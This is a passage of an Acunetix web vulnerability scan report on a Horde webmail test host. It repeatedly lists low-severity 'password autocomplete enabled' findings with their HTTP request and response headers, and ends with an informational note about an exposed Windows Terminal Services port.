Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Dansk HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:22 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (81366dbb3a1b19d17070dae7247058f6) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=YOAPl3vWsuqm_TL_FXgl0owpZmM&imapuser=iyeojwka | ||||||||||||||||||
Acunetix Website Audit | 71 |
&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (8d2af24adeca98940d4ca72de057c259) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Syria)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (92d3a0adc0d0c42811b54244a0913050) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=81ZHbgsWu6SDUtUtwCSI2FaJ-BE&imapuser=hurcfetk&logout_reason=badlogin&server=pop HTTP/1.1 | ||||||||||||||||||
Acunetix Website Audit | 72 |
Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (98144b1b8c67561c22adeba83a43a266) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=py6BVY4d7g6gx0ofFWB1kQ6hRdY&imapuser=sjtjgfnc&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Bahasa%20Indonesia HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** |
||||||||||||||||||
Acunetix Website Audit | 73 |
Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Catal%26%23xe0; HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x010c;esky HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host |
||||||||||||||||||
Acunetix Website Audit | 74 |
Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (b0db092b89360e30820e995c6abbbc83) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=g9u7H-78CHQyg9CQNPHaIUumuT8&imapuser=grwtfvif&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (b3cb8470038a18bddad7a22934963f28) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=UVdJ_qdy2FCjlafyUTTJOJOjkUM&imapuser=tjmxnsfk&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive |
||||||||||||||||||
Acunetix Website Audit | 75 |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) | ||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=X15QsD-1zAYbNp-KXZCaCs97Ev4&imapuser=uwbkfapt&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Bosanski HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Acunetix Website Audit | 76 |
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (eb39b850bb307c9b610a48be2af0d636) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=WpLNAAqx7QwZs-m-mA-TXAsylgU&imapuser=gmbrshlo&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=5HmQhu81IJ8NQd3wg4Xsyucnj7Q&imapuser=lwnnwvll&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
Acunetix Website Audit | 77 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (fa2cb8a65862e58974030595118192cb) | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Oman)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10190 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/redirect.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 78 |
Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:03 GMT |
||||||||||||||||||
/imp/test.php | ||||||||||||||||||
Details | ||||||||||||||||||
Password type input named passwd from form named form1 with action test.php has autocomplete enabled. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/test.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/ Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 16:36:45 GMT Content-Length: 4560 |
||||||||||||||||||
Windows Terminal Services server running | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Informational | |||||||||||||||||
Type | Configuration | |||||||||||||||||
Reported by module | Scripting (windows_terminal_services.script) | |||||||||||||||||
Description | ||||||||||||||||||
A Windows Terminal Services server is running on this host. Terminal Services is one of the components of Microsoft Windows (both server and client versions) that allows a user to access applications and data on a remote computer. Microsoft's RDP implementation of Terminal Services doesn't verify the server's identity when setting up the encryption keys for the RDP session. This vulnerability can result in a potential man-in-the-middle (MITM) attack. | ||||||||||||||||||
Impact | ||||||||||||||||||
Possible information disclosure. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
It's recommended to restrict access to valid users and/or hosts. | ||||||||||||||||||
Affected items | ||||||||||||||||||
Server | ||||||||||||||||||
Details | ||||||||||||||||||
The Windows Terminal Services server is running on TCP port 3389. | ||||||||||||||||||
Acunetix Website Audit | 79 |